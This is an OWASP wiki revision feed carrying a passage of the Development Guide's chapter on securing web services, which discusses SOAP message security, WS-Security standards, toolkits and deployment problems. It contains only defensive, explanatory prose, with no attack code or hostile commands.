Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken gigabyte processing threshold, and allow for real-time processing of huge documents, decorated according to the variety of the latest Web Service security standards, not only WSS. The usage simplicity is another attractive point of those systems - in the most trivial cases, the hardware box may be literally dropped in, plugged, and be used right away. These qualities come with a price, however – this performance and simplicity can be achieved as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such hardware device, Layer 7 Technologies provides a scalable SecureSpan Networking Gateway, which acts both as the inbound firewall and the outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (couple years old at most), or still being developed. Although standards development is done in committees, which, presumably, reduces risks by going through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing resulting from pounding by thousands of developers working in the real field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that for political reasons some of these standards are withheld from public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task, which is an accepted reality, and SOAP processing slows it down even more. Now, with expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market are facing this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving the performance, cannot always be used as an optimal solution, as they cannot be easily integrated with the already existing back-end software infrastructure, at least – not without making performance sacrifices. Another consideration whether hardware-based systems are the right solution – they are usually highly specialized in what they are doing, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services, but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As could be deduced from the previous sections, Web Service security standards are fairly complex, and have very steep learning curve associated with them. Most of the current products, dealing with Web Service security, suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all different policies, identities, keys, and protocols takes a lot of time and good understanding of the involved technologies, as most of the times errors that end users are seeing have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standard’s bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define the rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying the administrators with ready for deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59470</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59470"/>
				<updated>2009-04-26T11:57:12Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Referencing message parts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
